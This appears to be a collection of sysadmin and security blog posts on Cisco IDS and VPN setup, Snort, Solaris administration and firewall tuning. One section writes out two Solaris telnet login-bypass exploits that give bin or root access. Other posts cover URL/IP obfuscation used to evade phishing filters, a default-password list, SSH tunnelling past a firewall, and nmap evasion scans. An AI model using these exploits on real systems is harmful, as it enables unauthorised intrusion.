Cisco IDS

First, the link to research signatures:
http://tools.cisco.com/security/center/home.x

Now a tip for using the Cisco IDSM module without purchasing their overpriced control station. The IDSM module will not syslog alert, it also will not SNMP trap by default. So how do I get the IDSM module to trap when an event is triggered?

The Key is the "Event Action Override", this allows you to set a default action for all signatures that fall withing a specified Risk Rating (RR) range. In my case I set the default action of sending an SNMP trap for signatures with a RR of 18-100. 100 is the max RR, 18 is the lowest RR of signatures that by default alert. This will ensure that all signatures that are set to "alert" will produce an SNMP trap.

What about signatures that have a RR that is 18 or more, but shouldn't alert? Such as signatures that are apart of meta-events?

That is where the "Event Action Filter" comes into play. It allows us to specify signatures that we don't want to send a trap. You can specify signature(s), sub-signature(s), RR, etc.. Then you simply select to over-ride the SNMP trap action.

You might be thinking that this seems convoluted, why not simply adjust the signatures to trap? Well, because there are hundreds of signatures and they will need to be reviewed everytime they are updated. By using the "Event Action Override" new signature will automatically send a trap by default. The Event Action Filtering will only be needed for a few noisy signatures based on your environment.

Cisco VPN and Filters

access-list vpn-crypto-domain permit ip object-group local-hosts object-group remote-hosts

# Note these are used for both incoming and outgoing connection!

access-list vpn-acl permit tcp object-group remote-hosts object-group localhosts eq 22

access-list vpn-acl permit icmp object-group remote-hosts object-group localhosts

access-list vpn-acl permit tcp object-group localhosts object-group remote-hosts

crypto map VPN_MAP1 230 match address vpn-crypto-domain

crypto map VPN_MAP1 230 set peer xx.xx.xx.xx

crypto map VPN_MAP1 230 set transform-set ESP-AES256-SHA

group-policy vpn-filter internal

group-policy vpn-filter attributes

vpn-filter value vpn-acl

pfs disable

tunnel-group xx.xx.xx.xx type ipsec-l2l

tunnel-group xx.xx.xx.xx ipsec-attributes

pre-shared-key *

tunnel-group xx.xx.xx.xx general-attributes

default-group-policy vpn-filter

Tunnel of Love

Quick and easy SSH tunneling:

Scenario: I'm at home and I need to connect to a gui at work. The problem is that I cannot get to the gui directly through the firewall.

Solution: An SSH tunnel to proxy the connection from...since SSH is allowed through.

Systems Involved:
1. Home Computer (Windows with Cygwin & ssh)
2. Work computer (Solaris with SSH running)
3. HTTPS gui server.

Step 1: Create a listner on the work computer that will forward the ssh connection to the https server.
work-computer # ssh -R 22:guiserver:443 username@work-computer

Step 2: Create a listner on your home computer that will forward the https connection through SSH to the work computers proxy.
home-computer # ssh -L 8080:localhost:22 username@work-computer

Step 3: Test
https://localhost:8080


* This is nothing new
** This is my cheat sheet

Upgrading Snort

Upgrading Snort is not really that difficult of a procedure, the basics are:

1. Stop the current snort running
• Backup the current snort installation
• mv /usr/local/snort /usr/local/snort.old
2. Configure Snort
• ./configure --prefix=/usr/local/snort
3. Compile & Install
• make; make install
4. Now, I usually copy the old configuration files to the new installations.
5. Run the rc scripts and BAM! good as gold.

Except when you go from such an old version, you will get the following error:

FATAL ERROR: database: The underlying database seems to be running an older version of the DB schema (current version=106, required minimum version= 107). If you have an existing database with events logged by a previous version of snort, this database must first be upgraded to the latest schema (see the snort-users mailing list archive or DB plugin documention for details). If migrating old data is not desired, merely create a new instance of the snort database using the appropriate DB creation script (e.g. create_mysql, create_postgresql, create_oracle, create_mssql) located in the contrib\ directory. See the database documentation for cursory details (doc/README.database). and the URL to the most recent database plugin documentation.

The problem we run into, is that the new version of Snort requires an upgrade to the Database schema. Now, the readme in the distro will point you to the scripts included in the distro's contrib directory. These will build a new snort database.

The problem is that I have 90 days worth of events I don't want to loose. So, the question how to change the schema without loosing the data. The answer is to simply:

1. ALTER TABLE signature ADD sig_gid INT UNSIGNED;
• This is the only addition needed by the new version of snort.
2. INSERT INTO schema (vseq, ctime) VALUES ('107', now());
• Snort queries the schema version when it starts to make sure the DB is compatible.
3. DELETE from schema where vseq=;
• Now we need to remove the previous version from the table

Now, restart Snort...and everything should come up fine.

Solaris & Linux Apps

You can read the full instructions here:
http://www.opensolaris.org/os/community/brandz/install/

# zonecfg -z Citrix
Citrix: No such zone configured
Use 'create' to begin configuring a new zone.
zonecfg:Citrix> create -t SUNWlx
zonecfg:Citrix> set zonepath=/export/zones/Citrix_root
zonecfg:Citrix> add net
zonecfg:Citrix:net> set address=192.168.0.20/24
zonecfg:Citrix:net> set physical=iprb0
zonecfg:Citrix:net> end
zonecfg:Citrix> add attr
zonecfg:Citrix:attr> set name="audio"
zonecfg:Citrix:attr> set type=boolean
zonecfg:Citrix:attr> set value=true
zonecfg:Citrix:attr> end
zonecfg:Citrix> commit
zonecfg:Citrix> exit
#

I used the CentOS tar ball dist that was made for Solaris10 SCLA:
http://opensolaris.org/os/community/brandz/downloads.

# zoneadm -z Citrix install -d /export/home/jc209962/centos_fs_image.tar
Installing zone 'Citrix' at root directory '/export/zones/Citrix_root'
from archive '/export/home/jc209962/centos_fs_image.tar'

# zoneadm list -iv
 ID NAME             STATUS     PATH                           BRAND    IP  
  0 global           running    /                              native   shared
  - Citrix           installed  /export/zones/Citrix_root      lx       shared

#
# zlogin Citrix
[Connected to zone 'Citrix' pts/5]
Welcome to your shiny new Linux zone.

       - The root password is 'root'.  Please change it immediately.

       - To enable networking goodness, see /etc/sysconfig/network.example.

       - This message is in /etc/motd.  Feel free to change it.

For anything more complicated, see:
       http://opensolaris.org/os/community/brandz/

You have mail.
-bash-2.05b# uname -a
Linux Citrix 2.4.21 BrandZ fake linux i686 i686 i386 GNU/Linux

Solaris 10, sconadm, and patching

I'm not a big fan of GUIs for simple tasks. Patching, IMHO is a simple task, especially on a home system.

Servers can be a bit trickier...since you want to test the patches and make sure that you aren't going to break something with one of the recommended patches.

But your home system...you really just want to apply all the newest patches for your system.

Now Sun's Update Manger is cool. It's really been a long time coming, given the perl scripts that have been around for years that did the same thing. But finally it's built in and it's pretty stable.

However, the CLI for it is IMHO the best part.

Here is all that I need to do to patch my system:

# smpatch update

Done, all the latest patches will be downloaded and installed. I put the command in cron and I will always be good to go.

However, before I can update, I must register to download the patches. This is done easily with sconadm

First, create a text file that has the following (remember to use your own values) The only values required are the ones I have filled in.

# vi /tmp/registration.txt
userName=sunsolve_user
password=sunsolvepass
hostName=
subscriptionKey=
portalEnabled=false
proxyHostName=
proxyPort=
proxyUserName=
ProxyPassword=
#

Now, we use this script to register the system with SunSolve:

# sconadm register -a -r /tmp/registration.txt

Goldmine right? Well, in my case...not so fast. I ended up with a lot of errors:

sconadm is running
javax.management.remote.JMXProviderException: Connection refused at com.sun.cacao.rmi.impl.CacaoRMIConnectorProvider.newJMXConnector(CacaoRMIConnectorProvider.java:415) at javax.management.remote.JMXConnectorFactory.getConnectorAsService(JMXConnectorFactory.java:415)

Why?

Well, If you are a DHCP user, you will need to make sure that your hostname can be resolved. For me, this meant I had to add it to /etc/hosts and reboot the system.

I have a small network, so I always get the same IP for this system. Added the line to /etc/hosts..and boom. I was in.

Final note, for those Solaris 10 DHCP users with a hostname of "Unknown" simply create the file/etc/nodename with the hostname you want:

# echo "MyHostName" > /etc/nodename

Now reboot!

Creating Solaris Packages

Here is the link: http://www.sunfreeware.com/pkgadd.html

1. Create a clean /usr/local/ for install.

2. Go into the /usr/local directory with

unix# cd /usr/local

and run the command

unix# find . -print | pkgproto > prototype

This will produce the prototype file in /usr/local.

3.Now take your editor and edit out the line that has the prototype file name in it. Then add a line like

i pkginfo=./pkginfo

4. Finally, convert all the user and group ownerships from whatever they are to bin and bin (or whatever, see Red note below). An example file looks like

i pkginfo=./pkginfo
d none bin 0755 bin bin
f none bin/prog 0755 bin bin
d none doc 0755 bin bin
f none doc/doc1 0644 bin bin
d none lib 0755 bin bin
f none lib/lib1 0644 bin bin
d none man 0755 bin bin
d none man/man1 0644 bin bin
f none man/man1/prog.1 0444 bin bin

5. Now in /usr/local create a file pkginfo with contents for your package like

PKG="SCprog"
NAME="prog"
ARCH="sparc"
VERSION="1.00"
CATEGORY="application"
VENDOR="Christensen and Associates, Inc."
EMAIL="steve@smc.vnet.net"
PSTAMP="Steve Christensen"
BASEDIR="/usr/local"
CLASSES="none"

These values are fairly obvious, but they mean

PKG = the name you have chosen for the package directory
NAME = the program name
ARCH = the operating system version
VERSION = the version number for your program
CATEGORY = the program is an application
VENDOR = whoever wrote the software
EMAIL = an email contact
PSTAMP = the person who did the port perhaps
BASEDIR = the /usr/local directory where the files install
CLASSES = just put none here

6.Run pkgmk

Now while in /usr/local, run
unix# pkgmk -r `pwd`
This places a file in /var/spool/pkg called SCprog.

7. Run pkgtrans

Now do
unix# cd /var/spool/pkg
and then
unix# pkgtrans -s `pwd` /tmp/prog-1.00

You will be asked to select which package you want to make. Select you package name (like SCprog) by number.

This now creates a file called prog-1.00 in /tmp.

Easy Solaris Telnet Exploits

http://www.milw0rm.com/exploits/57

Example:
coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost

SunOS 5.8

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: whenever
$ whoami bin

OR

http://weblog.infoworld.com/securityadviser/archives/2007/02/huge_easy_solar.html

telnet -l "-froot" [hostname]

Every once in a while I run across a box running telnet internally and feel compelled to at least try these two. If you are running telnet, which is bad enough, for god sake at least patch. (and put tcp wrappers, and iptables, etc...)

QR Codes

http://qrcode.kaywa.com/

Interesting site that allows you to create QR codes, which are very similar to barcode, except they are in a square and can hold around 4000 characters of text.

You can also download a QRCode scanner from the site that can be loaded on your cell phone, that uses the cell phone camera as a scanner.

Windows Logon Types

http://www.windowsecurity.com/articles/Logon-Types.html

Logon Type 2 – Interactive
Logon Type 3 – Network
Logon Type 4 – Batch
Logon Type 5 – Service
Logon Type 7 – Unlock
Logon Type 8 – NetworkCleartext
Logon Type 9 – NewCredentials
Logon Type 10 – RemoteInteractive
Logon Type 11 – CachedInteractive

Blastwave: Solaris Software made Simple

http://www.blastwave.org/howto.html

This walks you through installing on of the best Solaris Software management systems ever.

Update packages easily.
Install packages effortlessly.

Obviously this is not meant for your production servers, but it works great on my desktop system.

CD-RW on Solaris

http://docsun.cites.uiuc.edu/sun_docs/C/solaris_9/SUNWaadm/SYSADV1/p65.html#MEDACCESS-5

How to burn a CD in Solaris. Sadly this is the first time in 10 years that I've actually had a CD/DVD-RW on a Sparc system (Ultra45). So this is the first time I've had a chance to mess with it.

Summary:

$ cdrw -l
Looking for CD devices...
  Node                   Connected Device                Device type
----------------------+--------------------------------+-----------------
cdrom1               | YAMAHA   CRW8424S         1.0d | CD Reader/Writer

$ mkisofs -r /pathname > cd-file-system

-r	Creates Rock Ridge information and resets file ownerships to zero.
/pathname	Identifies the pathname used to create the ISO 9660 file system.
> cd-file-system	Identifies the name of the file system to be put on the CD.

Copy the CD file system onto the CD.

$ cdrw -i cd-file-system

-i cd-file-system

Specifies the image file for creating a data CD.

Firekeeper - FireFox IDS

http://firekeeper.mozdev.org

First official alpha release of Firekeeper - Intrusion Detection and Prevention System for Firefox is available for download. Firekeeper adds additional layer of protection to the browser. It uses flexible rules similar to Snort ones to describe browser based attack attempts. All incoming HTTP and HTTPS traffic is scanned with these rules. HTTPS and compressed responses are scanned after decryption/decompression. Suspicious response can trigger an alert that is displayed to the user or can be automatically cancelled, depending on an action specified in the rule. Firekeeper uses very effective pattern matching engine from Snort and with well written rules doesn't have a negative impact on the browser performance

Addictive Zombie Game

Normally, I get tired of Zombie Games Post haste...this one is pretty cool:

http://www.newgrounds.com/portal/view/363126

IP Obfuscation

The phishing blog PhishTank had the following article which was rather interesting:
http://www.phishtank.com/blog/2007/02/09/the-case-of-the-mysterious-hostname/


Basically, it reminds us that URLs (www.hostname.top) and IPs (123.123.123.123) are only formatted this way for human consumption...the computer can take the information in many forms. Take the following links:

www.phishtank.com
http://66.135.40.79/
http://1116153935/
http://0X42.0207.10319/
http://0102.8857679/

By taking the IP address out of base 10 numbers in octal organization...it makes it harder for humans and human made filters to pick-out.

Cell Phone as Home Phone

Dock And Talk: http://phonelabs.com/prd05.asp

Here is a pretty cool little device that converts your cell phone into your home phone. It is compatible with a number of wireless home phones on the market.

It's listed for $160, which is comprable to good 2.5 or 5.8 GHz phone sets out there.

Torpedo Comics

Torpedo Comics, New online comics store started by the drummer from System of a Down.

The store isn't even up and running yet, but the message board is. it's currently a small online community of comic fans...but I've been enjoying it.

Microsoft Security Analyzer

http://www.microsoft.com/technet/security/tools/mbsa2/default.mspx

This is a good tool to scan systems remotely for security issues.

The checks that are of interest:
1. Security Patches
2. Weak passwords
3. Firewall running

Here are the pros & cons

Pros:
1. Can scan multiple systems
2. Does several good security checks
3. Easy to use GUI

Cons:
1. No command line
2. No plain-text/CSV report option

Default Password List

Every once in a while it's nice to know the default password for a specific device or software package.

http://www.virus.org/default-password/view/All/1/

This is a nice collection of the default passwords for a wide range of products with and easy to use search.

'nuff said

SONET Basics

Here is the link:
http://www.iec.org/online/tutorials/sonet/topic01.html

SONET defines a technology for carrying many signals of different capacities through a synchronous, flexible, optical hierarchy. This is accomplished by means of a byte-interleaved multiplexing scheme. Byte-interleaving simplifies multiplexing and offers end-to-end network management.

The first step in the SONET multiplexing process involves the generation of the lowest level or base signal. In SONET, this base signal is referred to as synchronous transport signal–level 1, or simply STS–1, which operates at 51.84 Mbps. Higher-level signals are integer multiples of STS–1, creating the family of STS–N signals in Table 1. An STS–N signal is composed of N byte-interleaved STS–1 signals. This table also includes the optical counterpart for each STS–N signal, designated optical carrier level N (OC–N).

Solaris & Active Directory

Here is the Link:
http://blog.scottlowe.org/2006/08/15/solaris-10-and-active-directory-integration/

This is the best guide I've seen to getting the two to work together. I've worked on this before and have to say the initial documents from Sun were a little confusing.

This document seems to be pretty straight forward. Of course until I get my lab back up and running I can't try this out.

Snort Signature Writing

Here is the link:
http://www.snort.org/docs/snort_htmanuals/htmanual_2.4/node14.html

Here are the basics...

Rule format:
Action Protocol SrcIP SrcPort Direction DestIP DestPort (Packet Sig. | Msg)

Example:
alert tcp any any -> 192.168.0.1/24 111 (content "|00 01 86 a5|"; msg: "mountd access")

Dynamic rules sets are also explained.

CISCO: DoS Prevention

Here is the link:
http://www.ciscopress.com/articles/article.asp?p=345618&rl=1

This is a excerpt from the book Cisco Firewall Router Security

A Denial-of-Service (DOS) attack can cause immense harm to your business. In this chapter, you can learn how to deal with such an attack, and minimize the damage done.

There are links to other chapters, but this excerpt will give you some information on detecting DoS attacks, on implementing ACLs, and tuning IP settings to help prevent or at least survive as DoS attack.

DTrace for Fun and Profit

Here are the links:

Yeah, there is no way to sum up any of the info in the blog in a useful way. So check out these links, they provide different resources to learn the DTrace tools in Solaris.

• http://developers.sun.com/solaris/articles/dtrace_example.pdf
• Dynamic Tracing (DTrace) in the Solaris 10 OS, this article is a learn-by-example guide.
• http://www.sun.com/software/solaris/howtoguides/dtracehowto.jsp
• The DTrace How to Guide is intended to help a new user learn how to use DTrace for gathering and using system and application information from a Solaris 10 system
• http://developers.sun.com/solaris/articles/dtrace_quickref/dtrace_quickref.html
• This guide to Dynamic Tracing in the Solaris OS offers tables listing providers, functions, aggregating functions, variables, and built-in variables.

Windows Computer Investigation Guide

Here is the link:
http://www.microsoft.com/technet/security/guidance/disasterrecovery/computer_investigation/default.mspx

This guide is intended for IT professionals in the United States who need a general understanding of computer investigations, including many of the procedures that can be used in such investigations and protocols for reporting incidents

A secondary bookmark that you will need to use this guide is Sysinternals:
http://www.microsoft.com/technet/sysinternals/default.mspx

Some of the tools I use most often in my investigations are:

• PSExec:
• Remotly execute processes with limited-user rights
• PSLoggedOn:
• Show users logged on to a system
• PSLogList:
• Dump event log records
• PSTools:
• The PsTools suite includes command-line utilities for listing the processes running on local or remote computers, running processes remotely, rebooting computers, dumping event logs, and more.

You create a nice little batch script and you can automate information collection with these tools,

Checkpoint CLI guide

Here is the link:
http://www.secwiz.com/Default.aspx?tabid=52

Here is the CLI guide to checkpoint FW-1

cphaprob state
Status of high availability modules, shows which gateway is active, standby and down

Fw tab –t
Displays firewall state tables

fw log –f
Displays the log continuously.

In general, each NG log file is composed of four files:

• xx.log — stores the log records
• Troubleshooting
• xx.logptr — pointers to beginning of each log record
• xx.loginitial_ptr — pointers to beginning of each log chain (logs with the same connection id)
• xx.logaccount_ptr — pointers to beginning of each accounting record.
• In the case of the audit log file the files are
  
• xx.adtlog
  
• xx.adtlogptr
• xx.adtloginitial_ptr
• xx.adtlogaccount_ptr

More info is found in the guide.

Netfilter or IPTables

Here is the link:
http://www.redhat.com/docs/manuals/linux/RHL-9-Manual/security-guide/ch-fw.html

This from RedHat, but it pertains to any system you install iptables on...it also has some basic firewall info like:

There is a distinction between the REJECT and DROP target actions. The REJECT target denies access and returns a connection refused error to users who attempt to connect to the service. The DROP, as the name implies, drops the packet without any warning to telnet users. Administrators can use their own discretion when using these targets; however, to avoid user confusion and attempts to continue connecting, the REJECT target is recommended.

Good guide to using IPTables.

Checkpoint: Performance Tuning

Here is the link:
http://www.checkpoint.com/techsupport/documentation/FW-1_VPN-1_performance.html

This guide combines the Solaris performance and security tuning guides, but focuses specifically on the settings that effect your firewall performance.

Settings like:

• Tuning the STREAMS queues for high-throughput VPN-1 gateways
• set sq_max_size = 100 (for a Solaris gateway with 256MB RAM)
• Tuning the TCP hiwater parameters for maximal throughput
• ndd -set /dev/tcp tcp_xmit_hiwat 65535 (default 8192)
• ndd -set /dev/tcp tcp_recv_hiwat 65535 (default 8192)
• Tuning the TCP Slow Start and TCP queue sizes
• set tcp:tcp_conn_hash_size = 16384
• ndd -set /dev/tcp tcp_slow_start_initial 2 (default 1)
• ndd -set /dev/tcp tcp_conn_req_max_q 1024 (default 128)
• ndd -set /dev/tcp tcp_conn_req_max_q0 4096 (dafault 1024)
• ndd -set /dev/tcp tcp_time_wait_interval 60000 (default 240000)

Netscreen Basics

Here is the link:
http://www.juniper.net/techpubs/software/erx/junose61/swconfig-system-basics/frameset.htm

This is everything you wanted to know about managing netscreen firewalls. Sadly it's in PDFs which make it a hassle, but this/these are the guides you want:

• CLI guide
• Writing CLI Macros
  
• HA guide
• Packet Mirroring
• Logging System Events (Includes event descriptions)

You can either open/download the individual PDFs or download the entire guide as one large PDF:
http://www.juniper.net/techpubs/software/erx/junose61/bookpdfs/swconfig-system-basics.pdf

Solaris System Tuning

Here is Sun's guide to tuning Solaris:
http://docs.sun.com/app/docs/doc/806-7009/6jftnqsiu?a=view

The most important thing to remember here is:

Make a copy of /etc/system before modifying it so you can easily recover from incorrect value
# cp /etc/system /etc/system.good

If a value entered in /etc/system causes the system to become unbootable, you can recover with the following command:
# boot -a

his command causes the system to ask for the name of various files used in the boot process. Press the carriage return to accept the default values until the name of the /etc/system file is requested. When the Name of system file [/etc/system]: prompt is displayed, enter the name of the good /etc/system file or /dev/null.

If /dev/null is entered, this path causes the system to attempt to read from /dev/null for its configuration information and because it is empty, the system uses the default values. After the system is booted, the /etc/system file can be corrected.

The guide will explain the different tunables, how to check performance, and when to change the settings.

Solaris: Kernel Tuning for Security

The guide is here:
http://www.securityfocus.com/infocus/1385

This is specifically about tuning your network setting to prevent network based attacks. For example:

Worried about ARP attacks:

# ndd -set /dev/arp arp_cleanup_interval
# ndd -set /dev/ip ip_ire_flush_interval

How about IP forwarding or SRC routing:

# ndd -set /dev/ip ip_forwarding 0
# ndd -set /dev/ip ip_strict_dst_multihoming 0
# ndd -set /dev/ip ip_forward_directed_broadcasts 0
# ndd -set /dev/ip ip_forward_src_routed 0

How about SYN Floods? First you need to get a baseline of SYNs . Either of these commands will do:

# netstat -an -f inet | grep SYN_RCVD | wc -l
# netstat -s -P tcp

Then you need to read the guide

NMAP: More port scanning techniques

This is the guide to nmap: http://searchsecurity.techtarget.com/tip/0,289483,sid14_gci1195745,00.html

Explains how to use Nmap's:

TCP Null (option –sN), FIN (option –sF) and Xmas (option –sX) scans to get through non-statful firewalls and packet filtering routers.

IPID Idle scan (option -sI) to to map out IP-based trust relationships between machines, and get through firewalls.

TCP ACK scan (option -sA), to help map out firewall rule sets.

As well as many other ways to test firewall configurations.